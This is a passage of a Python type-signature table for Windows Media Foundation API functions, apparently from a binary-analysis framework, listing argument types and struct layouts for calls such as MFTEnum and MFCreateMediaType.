'MFTRegisterLocalByCLSID': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["clisdMFT", "guidCategory", "pszName", "Flags", "cInputTypes", "pInputTypes", "cOutputTypes", "pOutputTypes"]),
#
'MFTUnregisterLocalByCLSID': SimTypeFunction([SimTypeBottom(label="Guid")], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT"]),
#
'MFTEnum': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypePointer(SimTypeBottom(label="Guid"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidCategory", "Flags", "pInputType", "pOutputType", "pAttributes", "ppclsidMFT", "pcMFTs"]),
#
'MFTEnumEx': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="IMFActivate"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidCategory", "Flags", "pInputType", "pOutputType", "pppMFTActivate", "pnumMFTActivate"]),
#
'MFTEnum2': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypePointer(SimTypeBottom(label="IMFActivate"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidCategory", "Flags", "pInputType", "pOutputType", "pAttributes", "pppMFTActivate", "pnumMFTActivate"]),
#
'MFTGetInfo': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="IMFAttributes"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT", "pszName", "ppInputTypes", "pcInputTypes", "ppOutputTypes", "pcOutputTypes", "ppAttributes"]),
#
'MFGetPluginControl': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFPluginControl"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppPluginControl"]),
#
'MFGetMFTMerit': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFT", "cbVerifier", "verifier", "merit"]),
#
'MFRegisterLocalSchemeHandler': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IMFActivate")], SimTypeInt(signed=True, label="Int32"), arg_names=["szScheme", "pActivate"]),
#
'MFRegisterLocalByteStreamHandler': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IMFActivate")], SimTypeInt(signed=True, label="Int32"), arg_names=["szFileExtension", "szMimeType", "pActivate"]),
#
'MFCreateMFByteStreamWrapper': SimTypeFunction([SimTypeBottom(label="IMFByteStream"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pStream", "ppStreamWrapper"]),
#
'MFCreateMediaExtensionActivate': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["szActivatableClassId", "pConfiguration", "riid", "ppvObject"]),
#
'MFCreateMuxStreamAttributes': SimTypeFunction([SimTypeBottom(label="IMFCollection"), SimTypePointer(SimTypeBottom(label="IMFAttributes"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributesToMux", "ppMuxAttribs"]),
#
'MFCreateMuxStreamMediaType': SimTypeFunction([SimTypeBottom(label="IMFCollection"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMediaTypesToMux", "ppMuxMediaType"]),
#
'MFCreateMuxStreamSample': SimTypeFunction([SimTypeBottom(label="IMFCollection"), SimTypePointer(SimTypeBottom(label="IMFSample"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSamplesToMux", "ppMuxSample"]),
#
'MFValidateMediaTypeSize': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["FormatType", "pBlock", "cbSize"]),
#
'MFCreateMediaType': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMFType"]),
#
'MFCreateMFVideoFormatFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "ppMFVF", "pcbSize"]),
#
'MFCreateWaveFormatExFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypePointer(SimStruct({"wFormatTag": SimTypeShort(signed=False, label="UInt16"), "nChannels": SimTypeShort(signed=False, label="UInt16"), "nSamplesPerSec": SimTypeInt(signed=False, label="UInt32"), "nAvgBytesPerSec": SimTypeInt(signed=False, label="UInt32"), "nBlockAlign": SimTypeShort(signed=False, label="UInt16"), "wBitsPerSample": SimTypeShort(signed=False, label="UInt16"), "cbSize": SimTypeShort(signed=False, label="UInt16")}, name="WAVEFORMATEX", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "ppWF", "pcbSize", "Flags"]),
#
'MFInitMediaTypeFromVideoInfoHeader': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pVIH", "cbBufSize", "pSubtype"]),
#
'MFInitMediaTypeFromVideoInfoHeader2': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "dwInterlaceFlags": SimTypeInt(signed=False, label="UInt32"), "dwCopyProtectFlags": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioX": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioY": SimTypeInt(signed=False, label="UInt32"), "Anonymous": SimUnion({"dwControlFlags": SimTypeInt(signed=False, label="UInt32"), "dwReserved1": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "dwReserved2": SimTypeInt(signed=False, label="UInt32"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER2", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pVIH2", "cbBufSize", "pSubtype"]),
#
'MFInitMediaTypeFromMPEG1VideoInfo': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"hdr": SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER", pack=False, align=None), "dwStartTimeCode": SimTypeInt(signed=False, label="UInt32"), "cbSequenceHeader": SimTypeInt(signed=False, label="UInt32"), "bSequenceHeader": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="MPEG1VIDEOINFO", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pMP1VI", "cbBufSize", "pSubtype"]),
#
'MFInitMediaTypeFromMPEG2VideoInfo': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"hdr": SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "dwInterlaceFlags": SimTypeInt(signed=False, label="UInt32"), "dwCopyProtectFlags": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioX": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioY": SimTypeInt(signed=False, label="UInt32"), "Anonymous": SimUnion({"dwControlFlags": SimTypeInt(signed=False, label="UInt32"), "dwReserved1": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "dwReserved2": SimTypeInt(signed=False, label="UInt32"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER2", pack=False, align=None), "dwStartTimeCode": SimTypeInt(signed=False, label="UInt32"), "cbSequenceHeader": SimTypeInt(signed=False, label="UInt32"), "dwProfile": SimTypeInt(signed=False, label="UInt32"), "dwLevel": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="MPEG2VIDEOINFO_FLAGS"), "dwSequenceHeader": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="MPEG2VIDEOINFO", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pMP2VI", "cbBufSize", "pSubtype"]),
#
'MFCalculateBitmapImageSize': SimTypeFunction([SimTypePointer(SimStruct({"biSize": SimTypeInt(signed=False, label="UInt32"), "biWidth": SimTypeInt(signed=True, label="Int32"), "biHeight": SimTypeInt(signed=True, label="Int32"), "biPlanes": SimTypeShort(signed=False, label="UInt16"), "biBitCount": SimTypeShort(signed=False, label="UInt16"), "biCompression": SimTypeInt(signed=False, label="UInt32"), "biSizeImage": SimTypeInt(signed=False, label="UInt32"), "biXPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biYPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biClrUsed": SimTypeInt(signed=False, label="UInt32"), "biClrImportant": SimTypeInt(signed=False, label="UInt32")}, name="BITMAPINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pBMIH", "cbBufSize", "pcbImageSize", "pbKnown"]),
#
'MFCalculateImageSize': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidSubtype", "unWidth", "unHeight", "pcbImageSize"]),
#
'MFFrameRateToAverageTimePerFrame': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["unNumerator", "unDenominator", "punAverageTimePerFrame"]),
#
'MFAverageTimePerFrameToFrameRate': SimTypeFunction([SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["unAverageTimePerFrame", "punNumerator", "punDenominator"]),
#
'MFInitMediaTypeFromMFVideoFormat': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pMFVF", "cbBufSize"]),
#
'MFInitMediaTypeFromWaveFormatEx': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"wFormatTag": SimTypeShort(signed=False, label="UInt16"), "nChannels": SimTypeShort(signed=False, label="UInt16"), "nSamplesPerSec": SimTypeInt(signed=False, label="UInt32"), "nAvgBytesPerSec": SimTypeInt(signed=False, label="UInt32"), "nBlockAlign": SimTypeShort(signed=False, label="UInt16"), "wBitsPerSample": SimTypeShort(signed=False, label="UInt16"), "cbSize": SimTypeShort(signed=False, label="UInt16")}, name="WAVEFORMATEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pWaveFormat", "cbBufSize"]),
#
'MFInitMediaTypeFromAMMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"majortype": SimTypeBottom(label="Guid"), "subtype": SimTypeBottom(label="Guid"), "bFixedSizeSamples": SimTypeInt(signed=True, label="Int32"), "bTemporalCompression": SimTypeInt(signed=True, label="Int32"), "lSampleSize": SimTypeInt(signed=False, label="UInt32"), "formattype": SimTypeBottom(label="Guid"), "pUnk": SimTypeBottom(label="IUnknown"), "cbFormat": SimTypeInt(signed=False, label="UInt32"), "pbFormat": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="AM_MEDIA_TYPE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pAMType"]),
#
'MFInitAMMediaTypeFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeBottom(label="Guid"), SimTypePointer(SimStruct({"majortype": SimTypeBottom(label="Guid"), "subtype": SimTypeBottom(label="Guid"), "bFixedSizeSamples": SimTypeInt(signed=True, label="Int32"), "bTemporalCompression": SimTypeInt(signed=True, label="Int32"), "lSampleSize": SimTypeInt(signed=False, label="UInt32"), "formattype": SimTypeBottom(label="Guid"), "pUnk": SimTypeBottom(label="IUnknown"), "cbFormat": SimTypeInt(signed=False, label="UInt32"), "pbFormat": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="AM_MEDIA_TYPE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "guidFormatBlockType", "pAMType"]),
#
'MFCreateAMMediaTypeFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeBottom(label="Guid"), SimTypePointer(SimTypePointer(SimStruct({"majortype": SimTypeBottom(label="Guid"), "subtype": SimTypeBottom(label="Guid"), "bFixedSizeSamples": SimTypeInt(signed=True, label="Int32"), "bTemporalCompression": SimTypeInt(signed=True, label="Int32"), "lSampleSize": SimTypeInt(signed=False, label="UInt32"), "formattype": SimTypeBottom(label="Guid"), "pUnk": SimTypeBottom(label="IUnknown"), "cbFormat": SimTypeInt(signed=False, label="UInt32"), "pbFormat": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="AM_MEDIA_TYPE", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "guidFormatBlockType", "ppAMType"]),
#
'MFCompareFullToPartialMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeBottom(label="IMFMediaType")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFTypeFull", "pMFTypePartial"]),
#
'MFWrapMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOrig", "MajorType", "SubType", "ppWrap"]),
#
'MFUnwrapMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pWrap", "ppOrig"]),
#
